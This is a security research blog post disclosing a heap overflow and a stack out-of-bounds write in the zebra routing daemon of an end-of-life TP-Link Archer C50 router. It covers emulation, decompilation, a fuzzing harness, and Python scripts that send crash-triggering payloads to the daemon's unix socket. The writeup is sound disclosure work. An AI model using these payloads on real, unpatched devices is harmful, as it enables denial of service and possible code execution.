I want to preface by saying the vendor has been informed of the bugs and chose to take no action as the affected product is EOL. The CVEs are still pending.

I have recently developed an interest in getting my hands on old electronic devices and hacking at them. There is a certain beauty in repurposing an old and otherwise probably useless end-of-life (EOL) device into a fun research project; one man's trash is another man's zero-day, as they say... This is nothing new: events such as Districtcon's "The Junkyard" have the same intent, hacking at EOL devices, though with prizes at stake. At the time of this writing, submissions for the next Junkyard are unfortunately closed, so I've decided to release this as a comprehensive guide on how I discovered two of my bugs.

The Target

Our target will be a TP-Link Archer-C50 router running on firmware version 0.8.0 0.2 v005c.0 Build 160824 Rel.36561n.

I am not going to cover the initial recon and research efforts that went into this project, as that would be a whole lot of fluff that I deem unnecessary for the purpose of this article. If you want to learn more about IoT/embedded pentesting methodology, there are many other resources out there already; I highly recommend Matt Brown's YouTube channel https://www.youtube.com/@mattbrwn. Instead we will focus on the process we followed to identify our two bugs, namely a heap overflow and a stack out-of-bounds (OOB) write affecting the router's zebra implementation.

But what is zebra you may ask?

Zebra is a multi-server routing software which provides TCP/IP based routing protocols. Zebra turns your machine into a full powered router. Some of the features of Zebra include:

  • Common routing protocols such as RIP, OSPF, BGP supported.
  • IPv6 routing protocols such as RIPng and BGP-4+ supported.
  • User can dynamically change configuration from terminal interface.
  • User can use command line completion and history in terminal interface.
  • IP address based filtering, AS path based filtering, attribute modification by route map are supported.

So zebra itself is not exposed to the network, but it interacts with other processes which are.

It's also worth noting that Zebra as it ships on our router is uncommon nowadays. It was discontinued a long time ago and forked into Quagga; Quagga was in turn discontinued after being forked into FRRouting, where zebra remains as a core utility.

Setting up for analysis

The Zebra server executable is a MIPS32 big-endian executable dynamically linked to uClibc as its standard C library. Its main method of external interaction is a unix socket, usually served at /var/tmp/.zserv.

Our analysis for now will combine static and dynamic techniques. Static analysis is done in Ghidra; I will not detail how to load the binary there. Dynamic analysis is done by emulating and debugging the binary, and our setup is described in the rest of this section.

To emulate the binary we will use qemu-mips-static, setting the system root to the firmware's root and letting the process hang until a debugger attaches to the gdb server listening on port 1337.

squashfs-root/usr/bin/qemu-mips-static -g 1337 -L squashfs-root squashfs-root/usr/sbin/zebra

Once a debugger has attached and execution continues, the above should create the unix socket under /var/tmp/.zserv, and the server should then be ready to receive and process data.

To connect to the gdb server we will write a simple gdb initialization script to avoid reconfiguring our debug environment every time we need to restart gdb.

# init.gdb
set architecture mips
set endian big

# Load the binary
file /home/goober/TP-Link_Archer_C50/firmware/_Archer_C50v2_0.8.0_0.2_up_boot\(160824\)_2016-08-24_10.11.00.bin.extracted/squashfs-root/usr/sbin/zebra

# Set sysroot to find libraries
set sysroot /home/goober/TP-Link_Archer_C50/firmware/_Archer_C50v2_0.8.0_0.2_up_boot\(160824\)_2016-08-24_10.11.00.bin.extracted/squashfs-root

# Connect to remote
target remote :1337

# Disable pagination
set pagination off

# Debug info
info target
info registers

We can simply connect to the gdb server with this command:

gdb-multiarch -x init.gdb

Now that we are able to emulate and debug the zebra server, we need a way to interface with it. The script below can send bytes to and receive bytes from the zebra server's unix socket. It is the template we will build upon for the rest of our dynamic analysis.

import socket

socket_path = '/var/tmp/.zserv'

# Create a Unix socket
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)

try:
    # Connect to the socket
    sock.connect(socket_path)
    print(f"Connected to {socket_path}")

    # Send data (example)
    message = b"DONGLES AND PRIMITIVES\n"
    sock.sendall(message)

    # Receive response
    response = sock.recv(4096)
    print(f"Received: {response}")

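# ConnectionRefusedError is a subclass of socket.error (OSError),
# so it has to be handled first or this branch is never reached
except ConnectionRefusedError:
    print("Connection refused - is the service running?")
except socket.error as e:
    print(f"Socket error: {e}")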
finally:
    sock.close()

Understanding the zebra server

Unix sockets have been part of well-known attacks before, for example container escapes through an exposed Docker socket, and most often they are avenues for a local user to escalate privileges. In embedded devices, however, unix sockets are generally not the most appealing entry point for an exploit: unlike TCP and UDP sockets, they often don't directly expose a way for an outside user to interface with them. This means that in order to exploit the zebra bugs we would need either an exploitation primitive or attack chain which enables us to write to the socket, or a way to have our payloads go through another routing-related daemon which interfaces with zebra, such as ripd. The first option is unlikely; we will discuss the second possibility in a later section.

Now that we understand how to interface with the executable, we can proceed with taint analysis: first finding a source, which in this case is whatever reads from the unix socket, and then sinks, which are whatever uses the data fed to the source.

Our source is the function at 0x40ac10, which calls read. read's first argument is the file descriptor, here the one corresponding to the unix socket; the second argument is the destination buffer; and the third argument is the maximum number of bytes to read into the buffer.


int FUN_0040ac10(int param_1,void *param_2,size_t param_3)

{
  ssize_t sVar1;
  size_t __nbytes;
  
  __nbytes = param_3;
  if (0 < (int)param_3) {
    do {
      sVar1 = read(param_1,param_2,__nbytes);
      if (sVar1 < 0) {
        return sVar1;
      }
      if (sVar1 == 0) break;
      __nbytes = __nbytes - sVar1;
      param_2 = (void *)((int)param_2 + sVar1);
    } while (0 < (int)__nbytes);
  }
  return param_3 - __nbytes;
}
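To make the loop's behaviour concrete, here is a minimal Python sketch of the same "keep reading until the requested count is satisfied" logic. The name read_exact and the use of os.read are my own choices for illustration and are not recovered from the binary. One difference to keep in mind: os.read raises OSError on failure, whereas the C function returns read's negative result.

```python
import os

def read_exact(fd: int, nbytes: int) -> bytes:
    """Read until nbytes have arrived or the peer closes the connection.

    Mirrors the loop in FUN_0040ac10: a short read does not end the
    loop, the remaining count is decremented and read is called again.
    """
    chunks = []
    remaining = nbytes
    while remaining > 0:
        chunk = os.read(fd, remaining)
        if not chunk:  # read returned 0 bytes: end of stream
            break
        chunks.append(chunk)
        remaining -= len(chunk)
    return b"".join(chunks)
```

The important property for what follows is that the function trusts nbytes completely: whatever count the caller passes is how much data may end up in the destination buffer.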

If we follow the destination buffer's subsequent uses and confirm with gdb, we find it is processed by a few functions until it reaches the function at 0x402f3c, where its pointer is stored at offset +0x14 of param_1 and loaded into iVar4. Values at offsets of iVar4 are then read into uVar2 (the first two bytes of our input) and cVar3 (the third byte of our input). Notice the switch statement in this function: it determines the control flow of the program based on our input. This is common in server software, where a jump table performs different actions based on client-provided data. It is a great find, as it gives us clearer avenues to explore for potentially interesting sinks in the different available program features.


undefined4 UndefinedFunction_00402f3c(int param_1)

{
  int iVar1;
  uint uVar2;
  char cVar3;
  int iVar4;
  undefined4 uVar5;
  
  iVar4 = *(int *)(param_1 + 0x14);
  uVar5 = *(undefined4 *)(param_1 + 0x18);
  *(undefined4 *)(iVar4 + 0xc) = 0;
  iVar1 = FUN_0040a908(*(undefined4 *)(iVar4 + 4),uVar5,3);
  if (0 < iVar1) {
    uVar2 = FUN_0040a438(*(undefined4 *)(iVar4 + 4));
    cVar3 = FUN_0040a400(*(undefined4 *)(iVar4 + 4));
    if ((2 < uVar2) &&
       ((uVar2 = uVar2 - 3 & 0xffff, uVar2 == 0 ||
        (iVar1 = FUN_0040a908(*(undefined4 *)(iVar4 + 4),uVar5,uVar2), 0 < iVar1)))) {
      switch(cVar3 + -1) {
      case '\0':
        FUN_00402764(iVar4,uVar2);
        break;
      case '\x01':
        *(undefined1 *)(iVar4 + 0x22) = 0;
        break;
      case '\x06':
        FUN_00402850(iVar4,uVar2);
        break;
      case '\a':
        FUN_00402a34(iVar4,uVar2);
        break;
      case '\n':
        FUN_00406344(0xb,iVar4,uVar2);
        break;
      case '\v':
        FUN_004063b0(0xc,iVar4,uVar2);
        break;
      case '\f':
        FUN_004063f0(0xd,iVar4,uVar2);
        break;
      case '\r':
        FUN_00406400(0xe,iVar4,uVar2);
        break;
      case '\x0e':
        FUN_00402c0c(iVar4,uVar2);
      }
      FUN_0040aad8(*(undefined4 *)(iVar4 + 4));
      FUN_00402d14(1,uVar5,iVar4);
      return 0;
    }
  }
  FUN_00402c44(iVar4);
  return 0xffffffff;
}
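Because the switch tests cVar3 - 1 and Ghidra prints the case labels as character escapes, the mapping from command byte to handler is easy to misread. The table below is a small Python sketch of that mapping as I read it from the decompilation above; HANDLERS and handler_for are hypothetical names used only for this illustration.

```python
# Command byte (third byte of input) -> what FUN_00402f3c does with it.
# The decompiled switch tests cVar3 - 1, so every case label is the
# command byte minus one ('\a' is 7, hence command 8, and so on).
HANDLERS = {
    0x01: "FUN_00402764",
    0x02: "inline: clears the byte at iVar4 + 0x22",
    0x07: "FUN_00402850",
    0x08: "FUN_00402a34",
    0x0B: "FUN_00406344",
    0x0C: "FUN_004063b0",
    0x0D: "FUN_004063f0",
    0x0E: "FUN_00406400",
    0x0F: "FUN_00402c0c",
}

def handler_for(command: int) -> str:
    """Return the handler for a command byte, or note the fall-through."""
    return HANDLERS.get(command, "no matching case")

for command in sorted(HANDLERS):
    print(f"{command:#04x} -> {HANDLERS[command]}")
```

Any other command byte matches no case and simply falls through the switch.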

Before the switch can be reached, two checks are performed. The first, iVar1 being greater than 0, has not caused me any issues, so it can be ignored. The second check is critical: we need uVar2 to be greater than 2 AND to pass one of two further checks. I have opted to solve the simpler one, which passes if (uVar2 - 3) & 0xFFFF equals 0. The only value satisfying this constraint is 3, and as uVar2 is the first two bytes of our input, this means we should start our input with the bytes \x00\x03 to reach further code paths.
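The constraint can be checked mechanically. The sketch below models the length check in Python and brute-forces every 16-bit value to confirm that 3 is the only one taking the simple branch. classify_length and build_header are hypothetical helper names, and the model only covers the arithmetic visible in the decompilation, not the reads themselves.

```python
import struct

def classify_length(length: int) -> str:
    """Model the check on the 16-bit length field before the switch."""
    if length <= 2:
        return "rejected"
    remaining = (length - 3) & 0xFFFF
    if remaining == 0:
        return "dispatch immediately"
    return f"second read of {remaining:#x} bytes must succeed"

def build_header(command: int) -> bytes:
    """Build the 3-byte header: big-endian length of 3, then the command."""
    return struct.pack(">HB", 3, command)

# Every 16-bit length that reaches the switch without a further read.
simple = [n for n in range(0x10000) if classify_length(n) == "dispatch immediately"]
print(simple)                  # [3]
print(build_header(0x01))      # b'\x00\x03\x01'
```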

We can adjust our script accordingly.

import socket

# Socket path
socket_path = '/var/tmp/.zserv'

# Create a Unix socket
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)

try:
    # Connect to the socket
    sock.connect(socket_path)
    
    # Payload
    head = b"\x00\x03" # uVar2
    cmd = b"\x01" # cVar3
    data = b"\x41"*100
    payload= head+cmd+data
    
    # Deliver payload
    sock.sendall(payload)

    # Receive response
    response = sock.recv(4096)
    print(f"Received: {response}")

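# ConnectionRefusedError is a subclass of socket.error (OSError),
# so it has to be handled first or this branch is never reached
except ConnectionRefusedError:
    print("Connection refused - is the service running?")
except socket.error as e:
    print(f"Socket error: {e}")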
finally:
    sock.close()

We can confirm by running this script and taking a peek at gdb that we are able to get past the constraint predicating our jump table of interest.

Finding a heap overflow

Great, now we have a general idea of how our user input is first processed by the zebra server! The next thing we could do is look through the different commands available to us and see which one leads to the most promising sink. That could be something like a memcpy or some other buffer write operation which we may have some control over. For our first bug this was not necessary: we found it by accident when sending 10000 chained "%s" character sequences as data, which made the server segfault. Sometimes finding bugs is simpler than we might think. Once you understand the core functionality of a program, it can open doors to many "not so deep" bugs that would hardly have been found otherwise. Now the challenge is understanding the bug.

At the end of the jump table function, on the path taken when our input is not dispatched to a command handler, there is a call to FUN_00402c44, which parses values from our user-controlled buffer. If the bytes at the start of our buffer are not null, FUN_0040a330 is called with the user-controlled buffer. Finally, in FUN_0040a330, the pointer at param_1+4 (our controlled buffer) is freed by FUN_0040990c, a wrapper around free. The SIGSEGV happens later, inside free's code.

┌─────────────────────────────────────────────────────────────────┐
│                   Heap overflow control flow                    │
└─────────────────────────────────────────────────────────────────┘

User Input: "%s%s%s%s..." (10000 chained)
    │
    ▼
┌───────────────────────────────────────────────────────────────┐
│ Jump Table Function                                           │
│ • Checks for valid command                                    │
│ • No match found (invalid command)                            │
└───────────────────────┬───────────────────────────────────────┘
                        │
                        ▼
┌───────────────────────────────────────────────────────────────┐
│ FUN_00402c44(user_buffer)                                     │
│ • Parses value from user-controlled buffer                    │
│ • Checks if buffer[0] != NULL                                 │
└───────────────────────┬───────────────────────────────────────┘
                        │ buffer[0] != NULL
                        ▼
┌───────────────────────────────────────────────────────────────┐
│ FUN_0040a330(user_buffer)                                     │
│ • Accesses param_1 + 4 (user-controlled pointer)              │
│ • Calls free wrapper: FUN_0040990c(param_1 + 4)               │
└───────────────────────┬───────────────────────────────────────┘
                        │
                        ▼
┌───────────────────────────────────────────────────────────────┐
│ FUN_0040990c() → free()                                       │
│ • Attempts to free corrupted pointer                          │
│ • SIGSEGV! Crash in free's internals                          │
└───────────────────────────────────────────────────────────────┘

free's purpose is to deallocate heap chunks, which means our bug is most likely heap related and likely falls into one of three categories: heap overflow, use-after-free or double free.

Our analysis tells us the following:

  • Double free: Breakpointing on free from the start of execution shows free is only executed once, targeting our user-controlled buffer, which in turn causes a SIGSEGV. realloc is never called either. This means the bug is almost certainly not a double free.
  • UAF: If it were a use-after-free, we would probably not see the corruption surface in free itself but in another function that uses the chunk after it has been freed.

This leaves us with a heap overflow as our best explanation. What is probably happening is that our input is stored on the heap, where it overflows into an adjacent heap chunk's metadata, causing a SIGSEGV when said corrupt chunk is freed.

We can confirm that the data written by the read call lands in a heap chunk whose size metadata is 0x1000. Looking for memory allocation calls in our program, we find an allocation of 0x1000 bytes done once by the calloc wrapper function at 0x40a2e0, not long after the program is initialized.

void FUN_004030f8(undefined4 param_1)
...
  uVar2 = FUN_0040a2e0(0x1000);

Sidenote, because I thought this was really intriguing: calloc differs from malloc in that it takes an element count and an element size, and returns a single zero-initialized block of count * size bytes. The allocation here is a single block made once, so unless the zeroing matters, malloc would have worked just as well. So why didn't they just use malloc..?

Comparing the address and metadata returned by calloc to those of read's destination buffer shows they are the same, and that the buffer's size is never readjusted.

When free is called, we can see that the chunk it receives as an argument has some data from our user input at its start, where the metadata would begin (recall we injected %s character sequences, which translate to \x25\x73 in hexadecimal). This makes sense because the preceding chunk is the one responsible for holding our input data, confirming we have corrupted an adjacent chunk's metadata by heap overflow.

0x41f968: 0x25732573 0x25730021 0x00000000 0x0041f990
0x41f978: 0x00000000 0x00000000 0x00000000 0x00001000
0x41f988: 0x00000000 0x00001009 0x00000000 0x00000000
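If the hex words are hard to read at a glance, a few lines of Python turn them back into bytes. This is only a convenience sketch; words_to_bytes is a hypothetical helper, and the words are packed big-endian to match the MIPS32 big-endian target.

```python
import struct

def words_to_bytes(words):
    """Pack 32-bit words big-endian, matching the MIPS32 BE target."""
    return b"".join(struct.pack(">I", word) for word in words)

# First two words of the row at 0x41f968 in the dump above.
print(words_to_bytes([0x25732573, 0x25730021]))  # b'%s%s%s\x00!'
```

The leading %s%s%s is the tail of our input sitting where the chunk's metadata should be.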

Heap overflow: Honing in on the root cause

Now that we know our bug is a heap overflow, the chunk's origin, the source and the input data triggering it we can more accurately determine HOW the input data triggers the heap overflow.

Looking back at our read call in the debugger, we notice there is not one but three consecutive read calls for our input data. The first read call ALWAYS reads the first 3 bytes of our input, that being the header and command. The read wrapper we presented earlier computes the number of bytes to request on its next read call as the current size minus the number of bytes just read. The second read call's sole purpose is to define the read size of the third call, in this case 0x2573 minus the 3 bytes already read, making it 0x2570. Finally, as you might have already figured, the third call reads up to 0x2570 bytes into our 0x1000-byte buffer, causing a heap overflow.

In conclusion, the flaw of this implementation is that the read size is taken from client data while the destination is a fixed-size buffer on the heap. This corresponds to the payload below in our python script, where the final read size works out to a very elite 0x1337 after it is processed.

<SNIP>
    head = b"\x00\x03"
    cmd = b"\x05"
    size = b"\x13\x3A"
    padding = b"A"*4100
    payload= head+cmd+size+padding
    sock.sendall(payload)
<SNIP>
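The arithmetic behind both payloads can be reproduced offline. The sketch below is a simplified model, not the server's code: it assumes every 3-byte header starts with a big-endian 16-bit length and that the follow-up read requests (length - 3) & 0xFFFF bytes, as the decompilation suggests. next_read_size and BUF_SIZE are hypothetical names.

```python
import struct

BUF_SIZE = 0x1000  # size of the single allocation made in FUN_004030f8

def next_read_size(header: bytes) -> int:
    """Size requested by the read that follows a 3-byte header."""
    (length,) = struct.unpack(">H", header[:2])
    return (length - 3) & 0xFFFF

# Accidental crash: header + command, then 10000 chained "%s".
stream = b"\x00\x03\x05" + b"%s" * 10000
first = next_read_size(stream[0:3])   # 0, the first message is complete
second = next_read_size(stream[3:6])  # "%s%" is parsed as a new header
print(hex(second), second > BUF_SIZE)  # 0x2570 True

# Deliberate payload: the size field 0x133A yields a read of 0x1337.
print(hex(next_read_size(b"\x13\x3A" + b"A")))  # 0x1337
```

In both cases the requested size is larger than the 0x1000-byte buffer, which is all the overflow needs.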

A brief look at exploitability

For the purpose of this article we will not write any exploits (beyond a simple DoS). However, we will briefly explore whether this first bug could be exploited for arbitrary code execution in the device's context.

Exploiting this binary should not be too convoluted, as it has no binary protections (NX, PIE, etc…) and relies on a relatively old uClibc version. uClibc itself is known to have a simpler heap implementation than glibc. As we can overwrite a chunk's metadata and have it freed, we have the primitives we need for an unsafe unlink attack, which could enable arbitrary code execution.

That being said, this bug is not exploitable in the device's context. The only daemon communicating with zebra here is ripd, which itself will never send packets larger than 200 bytes to the zebra daemon. This is a little disappointing, but now that we know this we can leverage the information to find more impactful bugs, as demonstrated in the next section.

Finding another bug with our foot in the door

At this point we have already figured out how to reach the different code paths in the jump table, but we have only found a bug by sending a big blob of data. There are still many more possibilities to explore here. We could again take the time to find more sinks where our data could trigger a bug, but at this point I felt a little lazy and mostly ready to move on from this project. Still, I didn't want to give up just yet, and I wanted to see if I could find another bug more likely to be exploitable in this device's context. So I decided instead to use our known constraints and write a fuzzing harness to find additional bugs in zebra.

To fuzz, we will simply pipe Radamsa outputs to the listening unix socket. Radamsa is a simple black-box fuzzing tool which generates test cases by mutating a given input. The mutated outputs stay close to the structure of the seeds, so they are often much more efficient at finding bugs than purely random data. Below is our fuzzing harness, which is run by passing the PID of the running server as an argument; the PID is used to monitor whether or not the zebra server is still running.

#!/bin/bash

TARGET_SOCKET="/var/tmp/.zserv"
SEED_DIR="seeds"
CRASH_DIR="./crashes"
TARGET_PID=$1

if [ -z "$TARGET_PID" ]; then
    echo "Usage: $0 <pid>"
    exit 1
fi

if ! kill -0 "$TARGET_PID" 2>/dev/null; then
    echo "Error: Process $TARGET_PID is not running"
    exit 1
fi

if [ ! -d "$SEED_DIR" ]; then
    echo "Error: Seed directory $SEED_DIR not found"
    exit 1
fi

mkdir -p "$CRASH_DIR"

COUNTER=0
RADAMSA_SEED=$$

while kill -0 "$TARGET_PID" 2>/dev/null; do
    ((COUNTER++))
    CURRENT_SEED=$((RADAMSA_SEED + COUNTER))

    INPUT_FILE="$CRASH_DIR/input_${COUNTER}_rseed_${CURRENT_SEED}.bin"
    ../radamsa/bin/radamsa -n 1 -s $CURRENT_SEED -r "$SEED_DIR" | head -c 512 > "$INPUT_FILE"

    cat "$INPUT_FILE" | socat -u - UNIX-CONNECT:$TARGET_SOCKET 2>/dev/null

    if [ $COUNTER -gt 10 ]; then
        rm -f "$CRASH_DIR/input_$((COUNTER - 10))_rseed_"*.bin
    fi

    [ $((COUNTER % 10)) -eq 0 ] && echo "Sent $COUNTER inputs (rseed: $CURRENT_SEED)"

    sleep 0.01
done

CRASH_SEED=$((RADAMSA_SEED + COUNTER))
echo ""
echo "=== CRASH DETECTED ==="
echo "Process $TARGET_PID crashed after $COUNTER inputs"
echo "Radamsa seed: $CRASH_SEED"
echo "Last input: $INPUT_FILE"
echo ""
echo "Reproduce:"
echo "  ../radamsa/bin/radamsa -T 512 -n 1 -s $CRASH_SEED -r $SEED_DIR > crash.bin"
echo "  cat crash.bin | socat -u - UNIX-CONNECT:$TARGET_SOCKET"
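For triage it can be handy to have the harness's two building blocks, the liveness check and the send, available from Python as well, for example to replay a saved input while gdb is attached. The sketch below is my own illustration and not part of the original harness; is_alive and replay are hypothetical names, and the socket path is the one used throughout this article.

```python
import os
import socket

def is_alive(pid: int) -> bool:
    """Same idea as `kill -0 <pid>`: signal 0 only checks for existence."""
    try:
        os.kill(pid, 0)
    except ProcessLookupError:
        return False
    except PermissionError:
        return True  # the process exists but belongs to another user
    return True

def replay(path: str, socket_path: str = "/var/tmp/.zserv") -> None:
    """Send the raw bytes of a saved input file to the zebra socket."""
    with open(path, "rb") as handle:
        data = handle.read()
    with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as sock:
        sock.connect(socket_path)
        sock.sendall(data)
```

A typical use would be calling replay("crash.bin") and then checking is_alive on the server's PID to confirm the input really is the one that kills it.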

Our seed corpus consists of seeds constrained by the following criteria:

  • Must start with the \x00\x03 header
  • Must set its third byte to one matching an available jump table command
  • Must be no longer than 200 bytes

This should generate inputs which will not overlap with our past bug while staying in a realistic size range for data zebra would receive from ripd.

After running the fuzzer for a few hours, input number 202783 (Radamsa seed 216808) triggered a crash.
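A corpus meeting the three criteria above can be generated with a few lines of Python. This is a sketch of one way to do it rather than the exact corpus I used: make_seed and write_corpus are hypothetical names, the command list is read off the jump table, and the 16 null bytes of body are an arbitrary placeholder.

```python
import os
import struct

# Command bytes that have a case in the jump table of FUN_00402f3c.
COMMANDS = (1, 2, 7, 8, 11, 12, 13, 14, 15)
MAX_LEN = 200  # upper bound on what ripd sends to zebra

def make_seed(command: int, body: bytes = b"") -> bytes:
    """Build one seed: \\x00\\x03 header, command byte, optional body."""
    seed = struct.pack(">HB", 3, command) + body
    if len(seed) > MAX_LEN:
        raise ValueError("seed exceeds the 200-byte limit")
    return seed

def write_corpus(directory: str = "seeds") -> list:
    """Write one seed file per command and return the paths written."""
    os.makedirs(directory, exist_ok=True)
    paths = []
    for command in COMMANDS:
        path = os.path.join(directory, f"cmd_{command:02d}.bin")
        with open(path, "wb") as handle:
            handle.write(make_seed(command, b"\x00" * 16))  # placeholder body
        paths.append(path)
    return paths
```

Calling write_corpus() creates the seeds directory that the harness expects. Note that Radamsa is free to mutate the header too, so the generated inputs will not all keep the \x00\x03 prefix.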

└─$ cat input_202783_rseed_216808.hex
01030801ffffffffffffffffffffffffffffffffffffffffffffffffffff
ffff00000306000000000306000000000306000000000306000000000306
000000000306000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000001700000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
0000
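Decoding the first bytes of this input with the header layout established earlier already tells us which code path it takes. The snippet below is a small sketch under that assumption; parse_header is a hypothetical helper name.

```python
import struct

def parse_header(data: bytes):
    """Split the 3-byte header into (length, command)."""
    length, command = struct.unpack(">HB", data[:3])
    return length, command

crash_prefix = bytes.fromhex("01030801ffffffff")
length, command = parse_header(crash_prefix)
print(hex(length), command)   # 0x103 8
print(hex(crash_prefix[6]))   # 0xff
```

Radamsa mutated the length field from 0x0003 to 0x0103, so the server performs a follow-up read of 0x100 bytes, and command 8 corresponds to case '\a' of the switch shown earlier, which calls FUN_00402a34.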

Looking at the crash, we find that it occurs when an invalid memory address is dereferenced. This time, though, it involves data on the stack.

Stack oob write: Honing in on the root cause

We'll keep this bug's explanation short and simple. FUN_00402a34 is called in this scenario, and within it FUN_00405254 is called. After FUN_00405254 executes, multiple values are moved from offsets of the stack to registers. Notably, s0 is set to the value at sp+64. This value is subsequently dereferenced at the instruction below, which fails for our input as it dereferences a pointer taken from the input's contents (0xffffffff):

lw a0,0x4 (s0)

undefined4
FUN_00405254(int param_1,undefined4 param_2,undefined4 param_3,undefined4 param_4,int param_5)

{
  int iVar1;
  undefined4 uVar2;
  int *piVar3;
  int iVar4;
  int *piVar5;
  
  iVar1 = FUN_00403f64(1);
  uVar2 = 0;
  if (iVar1 != 0) {
    FUN_00407e08(param_3);
    iVar1 = FUN_00409c60(iVar1,param_3);
    uVar2 = 0xfffffffc;
    if (iVar1 != 0) {
      piVar3 = (int *)0x0;
      for (piVar5 = *(int **)(iVar1 + 0x24); piVar5 != (int *)0x0; piVar5 = (int *)*piVar5) {
        if ((*(byte *)((int)piVar5 + 0x11) & 0x10) != 0) {
          piVar3 = piVar5;
        }
        if (piVar5[2] == 2) {
          iVar4 = piVar5[9];
          if ((((param_1 == 2) && (iVar4 != 0)) && (*(char *)(iVar4 + 8) == '\x01')) &&
             (*(int *)(iVar4 + 0xc) == param_5)) {
            if (piVar5[7] == 0) goto LAB_004053f4;
            piVar5[7] = piVar5[7] + -1;
            goto LAB_00405370;
          }
        }
        else if (piVar5[2] == param_1) {
LAB_004053f4:
          FUN_00404e94(iVar1,piVar5);
          goto LAB_00405358;
        }
      }
      if ((piVar3 == (int *)0x0) || (param_1 != 1)) {
        FUN_0040a080(iVar1);
        uVar2 = 0xfffffffc;
      }
      else {
        for (piVar5 = *(int **)((int)piVar3 + 0x24); piVar5 != (int *)0x0; piVar5 = (int *)*piVar5 )
        {
          *(byte *)((int)piVar5 + 9) = *(byte *)((int)piVar5 + 9) & 0xfd;
        }
        piVar5 = (int *)0x0;
        *(byte *)((int)piVar3 + 0x11) = *(byte *)((int)piVar3 + 0x11) & 0xef;
LAB_00405358:
        FUN_00404c14(iVar1,piVar5);
        if (piVar5 != (int *)0x0) {
          FUN_00404a74(piVar5);
LAB_00405370:
          FUN_0040a080(iVar1);
        }
        FUN_0040a080(iVar1);
        uVar2 = 0;
      }
    }
  }
  return uVar2;
}

The unexpected pointer in this area can be explained by a previous memcpy call whose size is derived from user-controlled data. memcpy's size argument is passed to FUN_0040a3b8 as "iVar4 + 7U >> 3". iVar4 (v0) is read as 0xff from offset 6 of our user-controlled buffer, which results in an unexpected size of 0x20.

void FUN_0040a3b8(void *param_1,int param_2,size_t param_3)

{
  memcpy(param_1,(void *)(*(int *)(param_2 + 4) + *(int *)(param_2 + 0xc)),param_3);
  *(size_t *)(param_2 + 0xc) = *(int *)(param_2 + 0xc) + param_3;
  return;
}

The highest possible value for the size is 0x20. This is not enough to overwrite the return address, but it may serve as a useful primitive depending on what data can be written to the arbitrary address. Exploitability has not been explored further, however.
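The size arithmetic is easy to verify. The sketch below reproduces the "iVar4 + 7U >> 3" expression in Python for every possible value of the controlling byte. The 4-byte destination is an assumption on my part: it is what an IPv4 address needs, and upstream Zebra's IPv4 route handlers copy a prefix of this computed size into one, but I have not confirmed the destination's size in this binary. copy_size and EXPECTED_MAX are hypothetical names.

```python
def copy_size(controlling_byte: int) -> int:
    """Python equivalent of the decompiled 'iVar4 + 7U >> 3'."""
    return (controlling_byte + 7) >> 3

EXPECTED_MAX = 4  # assumption: destination sized for an IPv4 address

print(hex(copy_size(0xFF)))                          # 0x20
print(hex(max(copy_size(b) for b in range(256))))    # 0x20

# Smallest byte value whose copy no longer fits in EXPECTED_MAX bytes.
first_oob = min(b for b in range(256) if copy_size(b) > EXPECTED_MAX)
print(first_oob)                                     # 33
```

Under that assumption, any value above 32 writes past the destination, up to 28 bytes beyond it for 0xff.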

Conclusion

This small research project demonstrates that server daemons on embedded devices can yield interesting vulnerabilities when approached systematically.

We discovered:

  • A heap overflow (size-controlled read), not exploitable in the device's context due to ripd constraints
  • A stack OOB write, limited but potentially useful as a primitive

Key insights:

  • Understanding the full attack surface (ripd size limits) is critical
  • Constrained fuzzing is more effective than blind fuzzing
  • Legacy code often has "low-hanging fruit" bugs which vendors are unwilling to patch

Stay tuned to this blog for more low-level shenanigans! Next you can expect something more exploitation or symbolic execution related, all in an ethical context as always ;).